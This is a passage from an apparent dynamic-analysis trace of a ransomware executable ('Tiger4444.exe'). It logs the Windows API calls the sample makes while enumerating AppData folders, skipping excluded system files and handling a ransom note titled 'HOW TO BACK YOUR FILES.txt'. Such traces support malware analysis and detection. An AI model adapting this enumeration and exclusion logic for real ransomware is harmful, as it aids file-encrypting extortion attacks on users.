ftLastWriteTime.dwLowDateTime=0x83edaf37, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.859] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.859] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.859] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.859] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.859] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.859] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83edaf37, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83edaf37, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83edaf37, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.859] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.859] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.859] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83edaf37, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83edaf37, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83edaf37, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.859] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.859] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.859] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\extensions\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.860] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.860] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.860] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.860] CloseHandle (hObject=0x2c8) returned 1 [0051.860] CloseHandle (hObject=0x2ac) returned 1 [0051.860] GetCurrentThreadId () returned 0xfa8 [0051.860] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0051.860] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" [0051.860] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765e8 | out: hHeap=0xc50000) returned 1 [0051.861] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0051.861] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" [0051.861] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\" [0051.861] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3" [0051.861] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.862] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.864] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.865] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.866] CloseHandle (hObject=0x2ac) returned 1 [0051.866] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft") returned 41 [0051.866] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.866] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x83edaf37, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0051.866] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.866] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.866] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.866] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.866] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x83edaf37, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.866] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.866] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.867] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.867] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.867] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.867] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83edaf37, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83edaf37, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83edaf37, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.867] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.867] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.867] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3385793c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x33c5d8bc, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x33c5d8bc, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Access", cAlternateFileName="")) returned 1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.867] lstrcmpiW (lpString1="Access", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="Tiger4444.exe") returned -1 [0051.867] lstrcmpiW (lpString1="Access", lpString2=".") returned 1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="..") returned 1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="windows") returned -1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="bootmgr") returned -1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="pagefile.sys") returned -1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="boot") returned -1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="ids.txt") returned -1 [0051.867] lstrcmpiW (lpString1="Access", lpString2="NTUSER.DAT") returned -1 [0051.867] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Access" | out: lpString1="Access") returned="Access" [0051.867] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0051.867] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc765e8 [0051.867] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc664e8 [0051.867] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208511b9, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x208511b9, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x208511b9, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="Tiger4444.exe") returned -1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2=".") returned 1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="..") returned 1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="windows") returned -1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="bootmgr") returned -1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="pagefile.sys") returned -1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="boot") returned -1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="ids.txt") returned -1 [0051.867] lstrcmpiW (lpString1="AddIns", lpString2="NTUSER.DAT") returned -1 [0051.867] lstrcpyW (in: lpString1=0x30aeafc, lpString2="AddIns" | out: lpString1="AddIns") returned="AddIns" [0051.867] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0051.867] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc73980 [0051.867] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663a8 | out: ListHead=0xc66828, ListEntry=0xc663a8) returned 0xc666a8 [0051.867] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0f124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d0f124, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2d35364, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="Tiger4444.exe") returned -1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2=".") returned 1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="..") returned 1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="windows") returned -1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="bootmgr") returned -1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="pagefile.sys") returned -1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="boot") returned -1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="ids.txt") returned -1 [0051.868] lstrcmpiW (lpString1="Bibliography", lpString2="NTUSER.DAT") returned -1 [0051.868] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Bibliography" | out: lpString1="Bibliography") returned="Bibliography" [0051.868] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0051.868] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6e) returned 0xc89b30 [0051.868] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc663a8 [0051.868] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd370742a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x39c1605f, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="Tiger4444.exe") returned -1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="windows") returned -1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="bootmgr") returned 1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="pagefile.sys") returned -1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="boot") returned 1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="ids.txt") returned -1 [0051.868] lstrcmpiW (lpString1="Credentials", lpString2="NTUSER.DAT") returned -1 [0051.868] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Credentials" | out: lpString1="Credentials") returned="Credentials" [0051.868] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials", dwFileAttributes=0x2010) returned 1 [0051.868] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0051.868] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6c) returned 0xc89c98 [0051.868] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666c8 | out: ListHead=0xc66828, ListEntry=0xc666c8) returned 0xc665c8 [0051.868] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789ca310, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789ca310, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="Tiger4444.exe") returned -1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="windows") returned -1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="bootmgr") returned 1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="pagefile.sys") returned -1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="boot") returned 1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="ids.txt") returned -1 [0051.869] lstrcmpiW (lpString1="Crypto", lpString2="NTUSER.DAT") returned -1 [0051.869] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Crypto" | out: lpString1="Crypto") returned="Crypto" [0051.869] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto", dwFileAttributes=0x10) returned 1 [0051.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0051.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc81f50 [0051.870] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc666c8 [0051.870] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ff935, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x32ff935, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x32ff935, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Tiger4444.exe") returned -1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="windows") returned -1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="bootmgr") returned 1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="pagefile.sys") returned -1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="boot") returned 1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="ids.txt") returned -1 [0051.870] lstrcmpiW (lpString1="Document Building Blocks", lpString2="NTUSER.DAT") returned -1 [0051.870] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Document Building Blocks" | out: lpString1="Document Building Blocks") returned="Document Building Blocks" [0051.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0051.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x86) returned 0xc79708 [0051.870] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc66528 [0051.870] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208e9b07, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x12e96cf, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="Tiger4444.exe") returned -1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2=".") returned 1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="..") returned 1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="windows") returned -1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="bootmgr") returned 1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="pagefile.sys") returned -1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="boot") returned 1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="ids.txt") returned -1 [0051.870] lstrcmpiW (lpString1="Excel", lpString2="NTUSER.DAT") returned -1 [0051.870] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Excel" | out: lpString1="Excel") returned="Excel" [0051.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0051.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc611e0 [0051.870] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc66568 [0051.870] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3800a8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8923b24, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InputMethod", cAlternateFileName="INPUTM~1")) returned 1 [0051.870] lstrcmpiW (lpString1="InputMethod", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.870] lstrcmpiW (lpString1="InputMethod", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.870] lstrcmpiW (lpString1="InputMethod", lpString2="Tiger4444.exe") returned -1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2=".") returned 1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2="..") returned 1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2="windows") returned -1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2="bootmgr") returned 1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2="pagefile.sys") returned -1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2="boot") returned 1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2="ids.txt") returned 1 [0051.871] lstrcmpiW (lpString1="InputMethod", lpString2="NTUSER.DAT") returned -1 [0051.871] lstrcpyW (in: lpString1=0x30aeafc, lpString2="InputMethod" | out: lpString1="InputMethod") returned="InputMethod" [0051.871] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0051.871] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6c) returned 0xc89ba8 [0051.871] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc66608 [0051.871] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xabc78877, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xabc78877, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="Tiger4444.exe") returned -1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="bootmgr") returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="pagefile.sys") returned -1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="ids.txt") returned 1 [0051.871] lstrcmpiW (lpString1="Internet Explorer", lpString2="NTUSER.DAT") returned -1 [0051.871] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0051.871] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0051.871] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x78) returned 0xc83510 [0051.871] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc66308 [0051.871] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc79a26a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc79a26a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc79a26a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="Tiger4444.exe") returned -1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2=".") returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="..") returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="windows") returned -1 [0051.871] lstrcmpiW 